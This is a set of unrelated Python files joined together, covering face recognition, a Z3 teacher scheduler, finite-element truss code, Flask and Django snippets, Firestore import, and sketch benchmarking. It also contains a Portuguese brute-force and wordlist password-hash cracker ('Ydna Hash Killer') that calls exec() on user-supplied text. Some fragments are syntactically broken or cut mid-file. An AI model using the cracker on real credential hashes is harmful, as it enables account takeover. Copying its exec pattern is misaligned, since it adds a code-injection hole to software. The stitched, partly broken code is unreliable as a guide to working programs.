print(f"Dados de treino: {len(train)} casos")
print(f"Dados de teste: {len(test)} casos")
for num_components in range(start_comps, max_comps):
model = cv.face.EigenFaceRecognizer_create(num_components)
src = []
labels = []
for person in train:
src.append(person.data)
labels.append(person.label)
model.train(src, np.asarray(labels))
max_distance = sys.float_info.min
min_distance = sys.float_info.max
mean_distance = 0
corrects = 0
true_positives = 0
for person in test:
label, confidence = model.predict(person.data)
if person.label == label:
corrects += 1
true_positives += 1
if confidence < min_distance:
min_distance = confidence
if confidence > max_distance:
max_distance = confidence
mean_distance += confidence
acurracia = true_positives / len(test) * 100
mean_distance /= len(test)
print(f"{num_components} componentes principais, acurácia: {acurracia:.2f}%")
print(f"Corretos: {corrects}")
print(f"Distância mínima: {min_distance}")
print(f"Distância máxima: {max_distance}")
print(f"Distância média: {mean_distance}")
print("*" * 20)
# Argumentos para rodar o trabalho
parser = argparse.ArgumentParser()
parser.add_argument(
'-p',
'--databasepath',
type=str,
default='.\dataset\ORL2',
help='Caminho para a base de dados')
args = parser.parse_args()
run_EigenFaceRecognizer(args.databasepath) |
import concurrent.futures
from tqdm import tqdm
import requests
from z3 import *
import math
import json
import time
# M = 3
# N = 13
# t = [3, 3, 4, 3, 4, 3, 3, 3, 4, 3, 3, 4, 4]
# c = [[0, 2, 3, 4, 8, 10], [0, 1, 3, 5, 6, 7, 8], [1, 2, 3, 7, 9, 11, 12]]
# S = [[2, 4, 8], [4, 10], [], [7, 9], [], [11, 12], [8, 12], [], [], [], [], [], []]
maximum_time = 18
minimum_time = 12
class Teacher():
def __init__(self,set_subject=[]):
self.subject_teachable = set_subject
class School():
def __init__(self,time_each_of_subject,list_of_teacher,constrain,maximum,minimum):
self.time_each_of_subject = time_each_of_subject
self.list_of_teacher = list_of_teacher
self.number_subject,self.number_teacher = len(time_each_of_subject),len(list_of_teacher)
self.constrain = constrain
self.subject_assign = [BitVec('subject_'+str(i),self.number_teacher.bit_length()+1) for i in range(self.number_subject)]
self.maximum_time,self.minimum_time = maximum,minimum
self.s = Solver()
def __str__(self):
tmp_list = []
self.previous_max_time = 0
"Giao vien Danh sach mon hoc duoc phan cong So tiet\n"
for i in range(self.number_teacher):
tmp_dict = {}
tmp_dict['Giao vien'] = i
tmp_dict['Danh sach mon hoc duoc phan cong'] = ""
the_sum = 0
for j in range(self.number_subject):
if self.s.model()[self.subject_assign[j]].as_long()==i:
tmp_dict['Danh sach mon hoc duoc phan cong'] += str(j)+","
the_sum += self.time_each_of_subject[j]
tmp_dict['So tiet'] = the_sum
if self.previous_max_time < the_sum:
self.previous_max_time = the_sum
tmp_list.append(tmp_dict)
return json.dumps(tmp_list)
def rule_0(self):# each subject assign smaller than number teacher
for i in range(self.number_subject):
self.s.add(self.subject_assign[i]<self.number_teacher)
self.s.add(self.subject_assign[i]>=0)
def rule_1(self):# pair subject can't assign by same teacher
for x,y in self.constrain:
self.s.add(self.subject_assign[x]!=self.subject_assign[y])
def rule_2(self):# time each teacher must satisfier
for i in range(self.number_teacher):
self.s.add(Sum([ If(self.subject_assign[j]==i,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) <= self.maximum_time)
self.s.add(Or(Sum([ If(self.subject_assign[j]==i,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) >= self.minimum_time,And([ If(self.subject_assign[j]!=i,True,False) for j in range(self.number_subject) ]) ))
def rule_2_reduce(self,id_teacher):# time each teacher must satisfier
self.s.add(Sum([ If(self.subject_assign[j]==id_teacher,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) <= self.maximum_time)
self.s.add(Or(Sum([ If(self.subject_assign[j]==id_teacher,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) >= self.minimum_time,And([ If(self.subject_assign[j]!=id_teacher,True,False) for j in range(self.number_subject) ]) ))
def rule_3(self):# all subject must teach by the best teacher
for subject_id in range(self.number_subject):
for teacher_id in range(self.number_teacher):
if subject_id not in self.list_of_teacher[teacher_id].subject_teachable:
self.s.add(self.subject_assign[subject_id]!=teacher_id)
def better_solution(self):# reduce maximum time highest teacher
# self.next_solution()
for i in range(self.number_teacher):
self.s.add(Sum([ If(self.subject_assign[j]==i,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) < self.previous_max_time)
def next_solution(self):
self.s.add(Or([self.subject_assign[i]!=self.s.model()[self.subject_assign[i]].as_long() for i in range(self.number_subject)]))
def solve_1(self):
self.rule_0()
self.rule_1()
self.rule_2()
self.rule_3()
if self.s.check()==sat:
return True
return False
def solve_2(self):
self.rule_0()
self.rule_1()
if self.s.check()==sat:
print("[?]Passing checkpoint 1")
self.rule_3()
if self.s.check()==sat:
print("[?]Passing checkpoint 2")
for i in tqdm(range(self.number_teacher)):
# print("[?]Sat teacher id:",i)
self.rule_2_reduce(i)
if self.s.check()==unsat:
return False
if self.s.check()==sat:
return True
return False
if __name__=="__main__":
## testing
teacher_0 = Teacher(set([0, 2, 3, 4, 8, 10]))
teacher_1 = Teacher(set([0, 1, 3, 5, 6, 7, 8]))
teacher_2 = Teacher(set([1, 2, 3, 7, 9, 11, 12]))
list_of_teacher = [teacher_0,teacher_1,teacher_2]
time_each_of_subject = [3, 3, 4, 3, 4, 3, 3, 3, 4, 3, 3, 4, 4]
constrain_subject = [(0,2),(0,4),(0,8),(1,4),(1,10),(3,7),(3,9),(5,11),(5,12),(6,8),(6,12)]
'''
logic input
num_subject num_teacher
subject_id number_time number_teachable list_teachable
.....
number_constrain
subject_0 subject_1
....
'''
"""
## too big
executor = concurrent.futures.ThreadPoolExecutor(max_workers=6)
data = requests.request("GET","https://raw.githubusercontent.com/dungkhmt/bkoptapplication/master/data/BCA/bca_input.txt")
data = data.text.split('\n')
number_subject,number_teacher = [int(i) for i in data[0].split(' ')]
list_of_teacher = [Teacher([]) for _ in range(number_teacher)]
time_each_of_subject = []
constrain_subject = []
print(number_subject,number_teacher)
for i in range(1,number_subject+1):
tmp = [int(i) for i in data[i][:-1].split(' ')]
id_subject = tmp[0]
time_each_of_subject.append(tmp[1])
# print(tmp[0],tmp[1])
for j in tmp[3:]:
list_of_teacher[j].subject_teachable.append(id_subject)
# print(j,list_of_teacher[j].subject_teachable,end=" ");
# input()
number_constrain = int(data[number_subject+1])
print(number_constrain)
for i in range(number_subject+2,number_subject+number_constrain+2):
constrain_subject.append([int(j) for j in data[i].split(' ')])
"""
# print(list_of_teacher[0].subject_teachable)
# print(constrain_subject)
# print(constrain_subject[0][0])
# input()
print("[*]Start counting!")
start = time.time()
school = School(time_each_of_subject,list_of_teacher,constrain_subject,maximum_time,minimum_time)
if school.solve_2():## solve_1 run too long
print("[+]First solution\n[?]Runtime:",time.time()-start)
while school.s.check() == sat:
print(school)
if 'n' in input("[?] Get better result(Y/n)").lower():
break
school.better_solution()
print("[!] No more better found!")
else:
print("[-]No solution found!\n[?]Runtime:",time.time()-start)
|
# -*- coding:utf-8 -*-
try:
from io import StringIO
except ImportError:
from StringIO import StringIO
from lxml import etree
OPTIONS = [
(('-p', '--path'), {'help': 'xml contains xpath criteria will be extracted', 'type': str}),
(('-b', '--body'), {'help': 'xpath element to extract when matching is found', 'type': str}),
(('-f', '--file'), {'help': 'input file', 'type': str}),
(('-o', '--output'), {'help': 'output file', 'type': str}),
(('-e', '--encoding'), {'help': 'output xml encoding (iso-8859-2, utf-8, ..)', 'type': str})
]
def add_arguments(parser):
for option, kwargs in OPTIONS:
parser.add_argument(*option, **kwargs)
def get_xml_lines(file):
xml_lines = []
with open(file) as logfile:
for line in logfile:
line = line.strip()
if line.startswith('<?xml'):
line = '<break/>'
xml_lines.append(line)
elif line.startswith('<'):
xml_lines.append(line)
return xml_lines
def make_xml_list(file):
return (xml for xml in ''.join(get_xml_lines(file)).split('<break/>'))
def encode_reply(reply):
try:
return reply.decode('utf-8')
except AttributeError:
return reply
def extract_xml_from_file(path=None, body=None, input_file=None, output_file=None, encoding=None):
encoding = encoding or 'iso-8859-2'
with open(output_file, 'ab') as output:
for xml in make_xml_list(input_file):
try:
root = etree.parse(StringIO(encode_reply(xml)))
except etree.XMLSyntaxError:
continue
found = root.xpath(path)
if found:
reply_tag = root.xpath(body)
if reply_tag:
output.write(etree.tostring(
root,
encoding=encoding,
xml_declaration=True,
pretty_print=True
))
|
# -*- coding: utf-8 -*-
"""
Author: Jef De Smet | jef.desmet@kuleuven.be
edited: Pieter Spaepen
Date: February 2020
Class of elements.
"""
"""
An element has at least
elementNr elementNr used as identifier of this element, must be chosen unique
firstNode the starting node
secondNode the ending node
elementLength the length of the element, to be calculated
elementArea A
elementEmodulus E
elementStiffnes the k value of the element
elementInertia I
elementAngle angle of the element in the world frame
elementStress will hold the calculated resulting stress
elementBuckleRisk will hold the calculated risk of buckling
two node instances attached to it, an elementNr, an elementLenght, an elementStiffness and elementAngle.
Extra features could be added.
"""
# Imports
import numpy as np
# select the example to plot, This should be altered in your code
book_ex = False
if book_ex:
A = 8 #value from textbook example
E = 1.9*10**6 #value from textbook example
I = 1 #random variable
Scale_Mpa = 1 #use 1 as the scale, no conversion to MPa
else:
#default values to be used when creating an element
plateThickness = 3*10**-3 #[m] plate thickness
elementWidth = 7*10**-3 #[m] width of the element
A = (plateThickness)*(elementWidth) #[m²] Surface area of cross section of the elements
E = 3*10**9 #[Pa] E modulus of MDF
I = ((elementWidth)*(plateThickness)**3)/12 #[m^4] Second moment of inertia, m4
Scale_Mpa = 10**6 #can be used to convert plots to Mpa
class element:
# this section can be used to initialize variables that have to be altered every time a node is created.
# e.g. list_of_elementNrs = []
list_of_elementNrs = []
def __init__(self,elementNr,firstNode,secondNode):
# if elementNr is 0 and element.list_of_elemenNrs is not empty-> assign next free elementNr
if elementNr == 0 and len(self.list_of_elementNrs) != 0:
# self.elementNr = elementNr + 1
self.elementNr = max(self.list_of_elementNrs) + 1
else:
self.elementNr = elementNr + 1
self.firstNode = firstNode
self.secondNode = secondNode
#calculate teh length of the element
self.elementLength = np.sqrt((firstNode.xPos - secondNode.xPos)**2 + (firstNode.yPos - secondNode.yPos)**2)
self.elementArea = A
self.elementEmodulus =E
#calculate the element stiffness (pdf p150)
self.elementStiffness = (self.elementArea*self.elementEmodulus) / self.elementLength
self.elementInertia = I
#calculate the angle of the element, use np.arctan2 to obtain a correct angle
self.elementAngle = np.arctan2(secondNode.yPos -firstNode.yPos , secondNode.xPos - firstNode.xPos)
self.stressScale = Scale_Mpa
#set the stress and buckling risk to nan
self.elementStress = np.nan
self.elementBuckleRisk = np.nan
# here your could things to do when you create a new element
# e.g. add the new elementNr to the list_of_elementNrs
element.list_of_elementNrs.append(self.elementNr)
# create a method to print all information of an element
def print_details(self,details):
#e.g. print("elementNr = {}".format(self.elementNr))
print(" elementNr = {}".format(self.elementNr))
print(" firstNode = {}".format(self.firstNode.nodeNr))
if details:
self.firstNode.print_details()
print(" secondNode = {}".format(self.secondNode.nodeNr))
if details:
self.secondNode.print_details()
print(" elementAngle = {}".format(self.elementAngle/(np.pi)*180))
# create a method to change the Emodulus to some value
def setEmodulus(self,value):
#add code here to change the E modulus (don't forget to also set the new elementStiffness)
self.elementEmodulus = value
self.elementStiffness = (self.elementArea*self.elementEmodulus) / self.elementLength
# create a method to change the Inertia to some value
def setInertia(self,value):
#add code here to change the E modulus
self.elementInertia = value
# create a method to calculate the stress based on the global displacement matrix
def setStress(self,U):
# U is the global displacement matrix with all the global displacement results
# in order to access the current information out of U you will have to use the node nrs
# step 1: select the relevant global displacements
# U_relevant = ...
U_relevant = [U[2*(self.firstNode.nodeNr),0],U[(2*(self.firstNode.nodeNr))+1,0],U[(2*(self.secondNode.nodeNr)),0],U[(2*(self.secondNode.nodeNr))+1,0]]
# step 2: T^-1 matrix to local displacements, (pdf p162)
# create T_inv based on the information of the element
# T_inv = ...
T_inv = [[np.cos(self.elementAngle),np.sin(self.elementAngle),0,0], \
[-np.sin(self.elementAngle),np.cos(self.elementAngle),0,0], \
[0,0,np.cos(self.elementAngle),np.sin(self.elementAngle)], \
[0,0,-np.sin(self.elementAngle),np.cos(self.elementAngle)]]
# step 3: calculate the local displacements
# tip: use np.matmul in order to do the correct
# u = ....
u = np.matmul(T_inv, U_relevant, out=None)
# step 4: calculate the stress using u[0] and u[2]
# self.elementStress =
self.elementStress = (self.elementEmodulus)*((u[0] - u[2])/(self.elementLength))
# create a method to calculate the buckling risk of the element
def setBuckleRisk(self):
k = 1 #coefficient of euler formula
# step 1: check if the elementStress is > 0 -> compression of the element
# else the element is in tension and the risk is set to 0
if self.elementStress > 0:
# step 2: calculate the maximum Buckling force using Euler formula
k = 1 #coefficient of euler formula
Fcrit = ((np.pi**2) * self.elementEmodulus * self.elementInertia)/(k * self.elementLength)**2
# step 3: calculate the current force based on Stress and Area
Fcur = self.elementStress*self.elementArea
# step 4: the buckling risk is the (current force)/(critical force)*100
self.elementBuckleRisk = (Fcur)/(Fcrit)*100
else:
self.elementBuckleRisk = 0
@classmethod
# this section can be used to act on the variables created in the top section
# e.g on the list_of_elementNrs
# e.g. def verify_unique_elementNr(cls)
# create code to verify if elementNrs are unique and return/print the result
# tip use "unique"
def verify_unique_elementNr(cls):
boolean = True
for x in cls.list_of_elementNrs:
count = 0
for y in cls.list_of_elementNrs:
if x == y:
count = count + 1
if count == 2:
boolean = False
print("Is unique element? : ")
print(boolean)
""" the following section helps you to debug the code:
You can test your functions by altering the code below
Do so for all the functions you create, investigate that everything behaves as expected
"""
def testfunctionElement():
""" create some hardcode values to test the code of this file"""
class node:
def __init__(self,nodeNr,xPos,yPos,X_disp,Y_disp,Fx,Fy):
self.nodeNr = nodeNr
self.xPos = xPos
self.yPos = yPos
self.xDisp = X_disp # it is important to set to nan if no boundary condition
self.yDisp = Y_disp # it is important to set to nan if no boundary condition
self.Fx = Fx # it is important to set to nan if no boundary condition
self.Fy = Fy # it is important to set to nan if no boundary condition
# here your could things to do when you create a new node
# e.g. add the new nodeNr to the list_of_nodeNr you ever created
n1=node(1,0,0,np.nan,np.nan,np.nan,np.nan) #node 1 of the textbook example
n2=node(2,3*12,0,np.nan,np.nan,np.nan,np.nan) #node 2 of the textbook example (feet to inch = *12)
n5=node(5,6*12,3*12,np.nan,np.nan,np.nan,np.nan) #node 2 of the textbook example (feet to inch = *12)
#class nodeTable:
# def __init__(self,n1,n2):
# self.nodeTable = [n1,n2]
#NT = nodeTable(n1,n2) #create a node table cuold be used for testing additional functions
#enter example of U: length(U) = 2*(highest_node_nr +1), values from the textbook example
U = np.array([[0], [0], [0], [0],[-0.00355], [-0.01026], [0], [0], [0.0018], [-0.0114], [0.0024], [-0.0195]])
""" we now have a nodeTable and nodes we can use for further testing of the code"""
test_element=element(0,n2,n5)
test_element.print_details(False) #printing with True will not work (why?)
test_element.setStress(U)
test_element.print_details(False) #the value of the stress should now be 86.81
test_element.setBuckleRisk()
test_element.print_details(False) #the value of the BucklerRisk should now be 9.6%
test_element.verify_unique_elementNr() #test this section of the code
''' call the testfunction in case the file is being runned as "main file" '''
if __name__ == '__main__':
testfunctionElement()
|
from django.contrib import admin
from micameo.order.models import (Order, Occasion, Cameo)
# Register your models here.
@admin.register(Occasion)
class Occasion(admin.ModelAdmin):
list_display = ["occasion_name"]
search_fields = ["occasion_name"]
@admin.register(Order)
class Order(admin.ModelAdmin):
list_display = ["email_client", "order_state", "talent", "talent_response", "order_price", "created"]
search_fields = ["email_client"]
@admin.register(Cameo)
class Cameo(admin.ModelAdmin):
list_display = ["order", "url_video"]
search_fields = ["order"]
|
import os
from datetime import datetime
from flask import Flask, Response, jsonify, request
from prometheus_flask_exporter import PrometheusMetrics
from prometheus_client import make_wsgi_app
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple
from books import bootstrap, views
from books.domain import commands
from books.service_layer.handlers import InvalidIsbn
app = Flask(__name__)
bus = bootstrap.bootstrap()
metrics = PrometheusMetrics(app)
metrics.info('app_info', 'books', version='1.0.0')
@app.route("/books/", methods=['GET'])
def book_list():
isbns = request.args.to_dict(flat=False).get('isbn')
result = views.books(isbns, bus.uow)
if not result:
return "not found", 404
return jsonify(result), 200
@app.route("/books/<isbn>", methods=['GET'])
def get_book(isbn: str):
result = views.books([isbn], bus.uow)
if not result:
return "not found", 404
return jsonify(result), 200
@app.route("/books/", methods=["POST"])
def add_book():
pub_date = request.json.get("pub_date")
if pub_date is not None:
pub_date = datetime.fromisoformat(pub_date).date()
try:
cmd = commands.AddBook(
request.json["isbn"], request.json["name"], request.json["price"], pub_date
)
bus.handle(cmd)
except InvalidIsbn as e:
return {"message": str(e)}, 400
return "OK", 201
if __name__ == "__main__":
from .config import get_api_url
host_port = get_api_url()
print(host_port)
# app.run(host_port.get("host"), host_port.get("port"), debug=True)
# Plug metrics WSGI app to your main app with dispatcher
dispatcher = DispatcherMiddleware(app.wsgi_app, {"/metrics": make_wsgi_app()})
run_simple(hostname=host_port.get("host"), port=host_port.get("port"), application=dispatcher) |
import json
import logging
from pathlib import Path
import firebase_admin.firestore
from google.api_core.exceptions import AlreadyExists, NotFound
from google.cloud.firestore_v1 import Client
from telegram import Message
from giru.config import settings
cert_file_path = Path(settings.FIREBASE_ACCOUNT_KEY_FILE_PATH).absolute()
SAVED_REPLIES_FILE_PATH = Path(settings.GIRU_DATA_PATH) / "replies.ndjson"
SCORES_FILE_PATH = Path(settings.GIRU_DATA_PATH) / "scores.json"
def process_message(db: Client, message: Message):
if not message.text:
return
chat_doc = db.collection("chats").document(str(message.chat_id))
chat_doc.set(message.chat.to_dict())
chat_doc.collection("messages").document(str(message.message_id)).set(
message.to_dict()
)
user = message.from_user
try:
db.collection("users").document(str(user.id)).create(user.to_dict())
except AlreadyExists:
logging.info("%s already existed", user.first_name)
def process_scores(db, first_name, score):
chat_doc = db.collection("chats").document("-1001254163442")
try:
chat_doc.create({})
except AlreadyExists:
pass
try:
chat_doc.collection("scores").document(first_name).create(dict(score=score))
except AlreadyExists:
logging.warning("%s already had a score here", first_name)
def main():
firebase_admin.initialize_app(
firebase_admin.credentials.Certificate(cert_file_path)
)
db: Client = firebase_admin.firestore.client()
for line in SAVED_REPLIES_FILE_PATH.read_text().splitlines():
message = Message.de_json(json.loads(line), None)
process_message(db, message)
scores = json.load(SCORES_FILE_PATH.open("r"))
for first_name, score in scores.items():
process_scores(db, first_name, score)
if __name__ == "__main__":
logging.basicConfig()
main()
|
from collections import Iterable
def flatten(items, ignore_type=(str,bytes)):
'''
对嵌套的序列进行扁平化操作
:param items: 可迭代对象
:param ignore_type: 最小元素类型
:return: 单个元素
'''
for x in items:
if isinstance(x,Iterable) and not isinstance(x,ignore_type):
yield from flatten(x)
else:
yield x
|
from flask import request
from app.api.responses import Responses
parties = []
class PoliticalParty:
"""this initializes political party class methods"""
def __init__(self, name, hqAddress, logoUrl):
self.party_id = len(parties) + 1
self.name = name
self.hqAddress = hqAddress
self.logoUrl = logoUrl
@staticmethod
def get_all_parties():
return Responses.complete_response(parties)
def add_political_party(self):
"""this saves political party data"""
new_party = {
"id": len(parties) + 1,
"name": self.name,
"hqAddress": self.hqAddress,
"logoUrl": self.logoUrl
}
parties.append(new_party)
class Update:
@staticmethod
def update_party_details(id):
task = [party for party in parties if party["id"] == id]
if not task:
return Responses.not_found("Party not found"), 404
task[0]['name'] = request.json.get('name', task[0]['name'])
return Responses.complete_response(task)
|
class Config(object):
def __init__(self, path):
@property
def pages(self):
return self
class Page(object):
def __init__(self, plugin, name, config):
self._name = name
self._config = config
self._plugin = plugin
def widget(self):
|
from django.conf.urls import patterns, url
from fans.views import get_fans, fans_report, group_up
urlpatterns = patterns(".views",
url('^get_fans/', get_fans),
url('^report/', fans_report),
url('^group_up/', group_up),
)
|
# i=input()
# print(f"hello {i}")
def square(x):
return x*x
def mian():
for i in range(10):
print("{} squared is {}".format(i,square(i)))
if __name__=="__main()__":
mian()
print(square(10))
|
####################
# Ydna Hash Killer #
# V: 1.1.1 #
####################
import itertools
import hashlib
import os
import hashlib,binascii
composicao = True
tamanho = True
continuar = True
continuar2 = True
continuargeral = True
chrs = ""
criptografia = ""
codehash = ""
quadro = """
----------------------------
| blake2s | sha3_256 |
| sha512 | sha256 |
| sha3_512 | sha256 |
| sha224 | sha512 |
| sha384 | md5 |
| sha3_384 | blake2b |
| sha1 | ntlm |
----------------------------
"""
logo = """
_ _ _____ _ _ _ _______ _ _ ______ _____
| | | | /\ / ____| | | | | |/ /_ _| | | | | ____| __ \
| |__| | / \ | (___ | |__| | | ' / | | | | | | | |__ | |__) |
| __ | / /\ \ \___ \| __ | | < | | | | | | | __| | _ /
| | | |/ ____ \ ____) | | | | | . \ _| |_| |____| |____| |____| | \ \
|_| |_/_/ \_\_____/|_| |_| |_|\_\_____|______|______|______|_| \_\
Ydna Hash Killer
Programado por: Nico Perez
"""
intro = """
1 - Realizar ataque de força bruta
2 - Realizar ataque de wordlist
"""
wordlistquadro = """
"""
################################## AQUI COMEÇA O CÓDIGO DE VERDADE ###############################
print(logo)
print(intro)
while continuargeral == True:
menuprincipal = int(input("O que deseja fazer?"))
if (menuprincipal == 1) or (menuprincipal == 2):
print(quadro)
print("")
menu2 = str(input ("Qual algorítmo de hash deseja testar? Escreva o nome como mostrado no quadro."))
print("")
hashcomp = str(input("Insira a hash."))
print("")
criptografia = menu2
codehash = "hashcerto = hashlib."
codehash += criptografia
codehash += "(senha6.encode())"
if menuprincipal == 1:
print ("")
print ("Componha sua amostragem utilizando os comandos abaixo:")
print ("")
print ("1 - Caracteres a-z")
print ("2 - Caracteres A-Z")
print ("3 - Caracteres 0-9")
print ("4 - Caracteres especiais !@#$%&*() ")
print ("")
print ("5 - Zerar padrões")
print ("6 - Prosseguir")
print ("")
while composicao == True:
menu1 = int(input("O que deseja fazer?"))
print("")
if menu1 ==1:
chrs += "abcdefghijklmnopqrstuvwxyz"
if menu1==2:
chrs += "ABCDEFGHIJLKMNOPQRSTUVWXYZ"
if menu1==3:
chrs += "0123456789"
if menu1==4:
chrs += "!@#$%&*()"
if menu1==5:
chrs = ""
if menu1==6:
composicao = False
print("")
minimo = int(input("Qual o mínimo de caracteres que deseja testar?"))
print("")
maximo = int(input("Qual o máximo de caracteres que deseja testar?"))
print("")
for n in range(minimo, maximo+1):
for xs in itertools.product(chrs, repeat=n):
if continuar == True:
if criptografia == "ntlm":
xs = str(xs)
xs = str(xs)
senha1 = (xs.replace("'", ""))
senha2 = (senha1.replace("(", ""))
senha3 = (senha2.replace(")", ""))
senha4 = (senha3.replace("'", ""))
senha5 = (senha4.replace(" ", ""))
senha6 = (senha5.replace(",", ""))
hash = hashlib.new('md4', xs.encode('utf-16le')).digest()
hashok = str((binascii.hexlify(hash)))
hashfinal = str(hashok.replace("'",""))
hashfinal = hashfinal[1:]
if hashfinal == hashcomp:
print ("")
print ("-------------------------------------------------------------")
print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
wait = input("PRESSIONE ENTER PARA SAIR")
continuar = False
else:
print ("A senha", senha6, "não corresponde. Sua hash é: ", hashfinal)
else:
xs = str(xs)
senha1 = (xs.replace("'", ""))
senha2 = (senha1.replace("(", ""))
senha3 = (senha2.replace(")", ""))
senha4 = (senha3.replace("'", ""))
senha5 = (senha4.replace(" ", ""))
senha6 = (senha5.replace(",", ""))
exec(codehash)
hex_dig = hashcerto.hexdigest()
if hex_dig == hashcomp:
print ("")
print ("-------------------------------------------------------------")
print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
wait = input("PRESSIONE ENTER PARA SAIR")
continuar = False
else:
print ("A senha", senha6, "não corresponde. Sua hash é: ", hex_dig)
else:
a=0
if menuprincipal ==2 :
print (wordlistquadro)
listauso = str(input("Escreva o nome da wordlist que deseja utilizar, exatamente como está no quadro. Caso possua uma wordlist personalizada em .txt, trasnfiara-a para o diretório do programa e insira seu nome, sem extensão."))
listauso += ".txt"
with open (listauso, "r") as myfile:
data= str(myfile.readlines())
novo = data.split()
for elem in novo:
palavra = (elem.replace("'", ""))
palavra = palavra[:-3]
if continuar2 == True:
if criptografia == "ntlm":
palavra = str(palavra)
senha1 = (palavra.replace("'", ""))
senha2 = (senha1.replace("(", ""))
senha3 = (senha2.replace(")", ""))
senha4 = (senha3.replace("'", ""))
senha5 = (senha4.replace(" ", ""))
senha6 = (senha5.replace(",", ""))
hash = hashlib.new('md4', palavra.encode('utf-16le')).digest()
hashok = str((binascii.hexlify(hash)))
hashfinal = str(hashok.replace("'",""))
hashfinal = hashfinal[1:]
if hashfinal == hashcomp:
print ("")
print ("-------------------------------------------------------------")
print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
print ("")
wait = input("PRESSIONE ENTER PARA SAIR")
continuar2 = False
else:
print ("A senha", senha6, "não corresponde. Sua hash é: ", hashfinal)
else:
xs = str(palavra)
senha1 = (xs.replace("'", ""))
senha2 = (senha1.replace("(", ""))
senha3 = (senha2.replace(")", ""))
senha4 = (senha3.replace("'", ""))
senha5 = (senha4.replace(" ", ""))
senha6 = (senha5.replace(",", ""))
exec(codehash)
hex_dig = hashcerto.hexdigest()
if hex_dig == hashcomp:
print ("")
print ("-------------------------------------------------------------")
print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
print ("")
wait = input("PRESSIONE ENTER PARA SAIR")
continuar2 = False
else:
print ("A senha", senha6, "não corresponde. Sua hash é: ", hex_dig)
else:
a = 0
|
# this code is on the lowest level .Hadn't added any error handling. Need to improve this in future
# See this link and add other methods https://github.com/eclipse/paho.mqtt.python#single
import paho.mqtt.client as paho
import time
import paho.mqtt.publish as publish
def my_mqtt_publish(topic, payload):
try:
publish.single(topic, payload, hostname="broker.mqttdashboard.com")
print "going to publish topic and i am in the other module"
print "going to publish topic : {0} and payload {1}".format(topic,payload)
except Exception as e:
print e.args, e.message
|
import pandas as pd
import numpy as np
import sketches
import matplotlib.pyplot as plt
import torch
from tqdm import tqdm
from pathlib import Path
import itertools
from multiprocessing import Pool
from functools import partial
import multiprocessing
def get_f_error(true, pred):
return np.sum(true * abs(pred - true)) / np.sum(true)
def get_mse(true, pred):
return np.sqrt(np.sum((pred - true) * (pred - true)) / np.sum(true))
def get_error(true_out, valid_out, test_out, mem_perc, nhashes, width, seed, sketch_type):
freqs = true_out.copy()
#print(true_out.sum())
nbuckets = int((mem_perc) * len(valid_out) / 100)
phantom_buckets = int((mem_perc) * 1.1 * len(valid_out) / 100)
assert nbuckets < len(valid_out)
cutoff = np.partition(valid_out, -phantom_buckets)[-phantom_buckets] #deliberately underset the cutoff.
test_out_mask = (test_out > cutoff)
filtered_values = freqs.copy()
filtered_values[~test_out_mask] = 0
nsamples = min(np.sum(test_out_mask), nbuckets)
if nsamples > 0:
samps = torch.multinomial(torch.Tensor(filtered_values), nsamples)
memmed_values = true_out.copy()
if nsamples > 0:
freqs[samps] = 0
if sketch_type == "cs":
preds = sketches.count_sketch_preds(nhashes, freqs, width, seed)
elif sketch_type == "cm":
preds = sketches.cm_sketch_preds(nhashes, freqs, width, seed)
if nsamples > 0:
preds[samps] = memmed_values[samps]
space = 4 * width * nhashes + 8 * nbuckets
return space, get_f_error(true_out, preds), get_mse(true_out, preds), np.sum(freqs)
def get_ideal_error(true_out, valid_out, test_out, mem_perc, nhashes, width, seed, sketch_type):
freqs = true_out.copy()
nbuckets = int(mem_perc * len(test_out) / 100)
cutoff = np.partition(test_out, -nbuckets)[-nbuckets]
test_out_mask = (test_out > cutoff)
filtered_values = freqs.copy()
filtered_values[~test_out_mask] = 0
samps = torch.multinomial(torch.Tensor(filtered_values), min(np.sum(test_out_mask), nbuckets))
memmed_values = true_out.copy()
freqs[samps] = 0
if sketch_type == "cs":
preds = sketches.count_sketch_preds(nhashes, freqs, width, seed)
elif sketch_type == "cm":
preds = sketches.cm_sketch_preds(nhashes, freqs, width, seed)
preds[samps] = memmed_values[samps]
space = 4 * width * nhashes + 8 * nbuckets
return (space, get_f_error(true_out, preds), get_mse(true_out, preds), np.sum(freqs))
def process_error(path, path2, exp_path, formula, path3=None,):
with torch.no_grad():
f = np.load(path)
true = np.load(path2, allow_pickle=True).item()
true_out = true['y']
valid_out = f["valid_output"].flatten()
test_out = f["test_output"].flatten()
test_out += 0.00001 * np.random.randn(*test_out.shape)
if path3 is not None:
f = np.load(path3)
valid_out_2 = f["valid_output"].flatten()
test_out_2 = f["test_output"].flatten()
test_out_2 += 0.00001 * np.random.randn(*test_out_2.shape)
spaces = []
f_errors = []
sums = []
widths = []
nhashes_arr = []
percs = []
sketch_types = []
rmses = []
seeds = []
tiny_1 = list(itertools.product(np.linspace(2.5, 20, 8), [1], [1000, 10000, 100000], np.arange(100), ["cm", "cs"]))
tiny_2 = list(itertools.product(np.linspace(2.5, 20, 8), [2, 3, 4], [1000, 10000, 100000], np.arange(20), ["cm", "cs"]))
qtiny = tiny_1 + tiny_2
q = qtiny
with Pool(12) as p:
if path3 is None:
if formula == "std":
pfunc = partial(get_error, true_out, valid_out, test_out)
if formula == "ideal":
pfunc = partial(get_ideal_error, true_out, valid_out, test_out)
if path3 is not None:
if formula == "std":
pfunc = partial(get_error_2, true_out, valid_out, test_out, valid_out_2, test_out_2)
if formula == "ideal":
pfunc = partial(get_ideal_error_2, true_out, valid_out, test_out, valid_out_2, test_out_2)
res = p.starmap(pfunc, tqdm(q))
for i in range(len(q)):
ele = q[i]
result = res[i]
percs.append(ele[0])
nhashes_arr.append(ele[1])
widths.append(ele[2])
seeds.append(ele[3])
sketch_types.append(ele[4])
spaces.append(result[0])
f_errors.append(result[1])
rmses.append(result[2])
sums.append(result[3])
df = pd.DataFrame({"space": spaces, "f_error": f_errors, "sum": sums,
"width": widths, "nhashes": nhashes_arr, "rmse": rmses, "seed": seeds,
"perc": percs, "sketch": sketch_types})
df.to_feather(exp_path)
def main():
